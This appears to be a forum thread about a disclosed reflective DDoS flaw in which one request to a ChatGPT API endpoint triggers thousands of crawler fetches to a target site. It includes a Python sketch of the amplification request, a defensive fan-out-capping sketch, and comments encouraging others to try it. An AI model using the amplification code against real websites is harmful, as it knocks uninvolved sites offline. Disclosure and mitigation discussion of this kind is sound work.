Haha, this would be an amazing way to test the ChatGPT crawler reflective DDoS vulnerability [1] that I published last week.
Basically, a single HTTP request to the ChatGPT API can trigger 5,000 HTTP requests from the ChatGPT crawler to a website.
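A minimal sketch of that amplification, assuming the endpoint accepts a JSON list of URLs (the exact payload shape is documented in the linked advisory; the "urls" field name here is my assumption) -- and, as noted further down, don't actually point this at anything you don't own:

    # Sketch of the reflection/amplification idea only -- do NOT run this
    # against a site you don't own. The "urls" field name is an assumption;
    # see the linked advisory for the real request format.
    import requests

    TARGET = "https://example.com"  # hypothetical site you control

    # One API call carrying thousands of distinct URLs; the crawler is said
    # to fetch each of them, so a single request fans out into ~5,000 fetches.
    urls = [f"{TARGET}/?nocache={i}" for i in range(5000)]

    resp = requests.post(
        "https://chatgpt.com/backend-api/attributions",
        json={"urls": urls},  # assumed field name
        timeout=30,
    )
    print(resp.status_code)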
The vulnerability is/was thoroughly ignored by OpenAI/Microsoft/BugCrowd, but I really wonder what would happen if the ChatGPT crawler interacted with this tarpit several times per second. Since the ChatGPT crawler uses various Azure IP ranges, I actually think the tarpit would crash first.
The vulnerability-reporting experience with OpenAI/BugCrowd was really horrific. It's always difficult to get attention for DoS/DDoS vulnerabilities, and companies always act like they are not a problem. But if their system goes dark and the CEO calls, then suddenly they accept it as a security vulnerability.
I spent a week trying to reach OpenAI/Microsoft to get this fixed, but I gave up and just published the writeup.
I don't recommend exploiting this vulnerability, for legal reasons.
[1] https://github.com/bf/security-advisories/blob/main/2025-01-...
Is 5,000 a lot? I'm out of the loop, but I thought c10k was solved decades ago. Or is it about the "burstiness" of it?
(That is, all the requests come in simultaneously -- the TLS handshakes would probably be the bottleneck.)
Nice find. I think one of my sites actually got hit by something like this recently. And yeah, this kind of thing should be trivially preventable if they cared at all.
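"Trivially preventable" in the sense that the API could deduplicate submitted URLs, collapse them per host, and cap the fan-out before handing anything to the crawler. A rough sketch of that idea -- the names and limits are made up for illustration, not OpenAI's actual code:

    # Hypothetical server-side guard, only to illustrate the point above:
    # deduplicate submitted URLs, limit how many go to a single host, and
    # hard-cap the fan-out per API call. Not OpenAI's actual implementation.
    from urllib.parse import urlparse

    MAX_URLS_PER_REQUEST = 10  # assumed limit
    MAX_URLS_PER_HOST = 2      # assumed limit

    def filter_crawl_targets(submitted_urls):
        seen = set()
        per_host = {}
        accepted = []
        for url in submitted_urls:
            if url in seen:
                continue  # drop exact duplicates
            host = urlparse(url).netloc
            if per_host.get(host, 0) >= MAX_URLS_PER_HOST:
                continue  # don't let one request hammer a single host
            seen.add(url)
            per_host[host] = per_host.get(host, 0) + 1
            accepted.append(url)
            if len(accepted) >= MAX_URLS_PER_REQUEST:
                break  # hard cap on crawler fan-out per API call
        return accepted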
Am I correct in understanding that you waited at most one week for a reply?
In my experience with large companies, that's rather short. Some nudging may be required every now and then, but expecting a response so fast seems slightly unreasonable to me.
What is the https://chatgpt.com/backend-api/attributions endpoint doing (or responsible for, when not crushing websites)?
Has anyone tested this and gotten it to work? I get a 301 in my terminal when trying to send a request to my site.
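If the 301 is coming from the API call itself, it may just be a canonicalization redirect (e.g. http to https, or a www/non-www hop); following the redirect chain shows where it points. A quick check, reusing the assumed endpoint and payload shape from the sketch further up the thread:

    # Follow redirects and print the chain to see whether the 301 is just an
    # http->https or host canonicalization hop. Endpoint and "urls" field are
    # assumptions; only list URLs for a site you own.
    import requests

    resp = requests.post(
        "https://chatgpt.com/backend-api/attributions",
        json={"urls": ["https://example.com/"]},  # assumed field name
        allow_redirects=True,
        timeout=30,
    )
    for hop in resp.history:
        print(hop.status_code, hop.headers.get("Location"))
    print("final:", resp.status_code, resp.url)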
How can it reach localhost, or is that only a placeholder for a real address?
Try it and let us know :)
I am not surprised that OpenAI is not interested in fixing this.